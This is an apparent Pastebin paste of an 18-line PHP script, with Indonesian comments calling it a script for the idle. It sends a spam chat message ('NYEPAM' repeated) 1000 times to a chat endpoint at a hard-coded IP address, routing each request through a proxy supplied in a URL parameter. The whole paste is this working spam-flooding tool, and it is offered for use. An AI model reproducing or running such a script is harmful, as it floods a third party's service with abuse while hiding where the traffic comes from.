Advertisement
Guest User

Untitled

a guest
Mar 28th, 2015
198
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.59 KB | None | 0 0
  1. <?php
  2. #2012 manusia_hobog
  3. #stafaband.info
  4. #script untuk yang kurang kerjaan
  5. #have fun!!
  6. if(isset($_GET["proxy"])){
  7. $c = curl_init();
  8. curl_setopt($c, CURLOPT_URL, 'http://184.173.241.147/chat');
  9. curl_setopt($c, CURLOPT_POST, true);
  10. curl_setopt($c,CURLOPT_RETURNTRANSFER, true);
  11. curl_setopt($c, CURLOPT_PROXY, $_GET["proxy"]);
  12. curl_setopt($c, CURLOPT_POSTFIELDS, 'n=spam_otomatis&m=NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM NYEPAM &send=Kirim');
  13. for($i = 1;$i <= 1000;$i++){
  14. curl_exec ($c);
  15. }
  16. }
  17.  
  18. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement